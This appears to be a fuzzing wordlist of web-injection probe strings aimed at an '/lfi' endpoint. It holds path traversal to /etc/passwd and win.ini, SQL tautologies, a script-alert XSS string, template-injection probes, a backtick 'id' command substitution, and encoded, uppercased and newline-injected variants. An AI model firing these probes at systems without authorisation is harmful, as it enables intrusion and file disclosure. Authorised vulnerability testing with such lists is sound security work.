lfi_probe
lfi_test
/lfi
/lfi/status
lfi=1
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2Flfi
%2Flfi%2Fstatus
lfi%3D1
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
LFI_PROBE
LFI_TEST
/LFI
/LFI/STATUS
LFI=1
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2FLFI
%2FLFI%2FSTATUS
LFI%3D1
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTP%3A%2F%2F127.0.0.1
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
lfi_probe?v=0
lfi_probe&v=0
lfi_probe_0
lfi_0
/lfi/0
lfi_probe%0a0
lfi_test?v=1
lfi_test&v=1
lfi_test_1
lfi_1
/lfi/1
lfi_test%0a1
/lfi?v=2
/lfi&v=2
%2Flfi_2
lfi_2
/lfi/2
/lfi%0a2
/lfi/status?v=3
/lfi/status&v=3
%2Flfi%2Fstatus_3
lfi_3
/lfi/3
/lfi/status%0a3
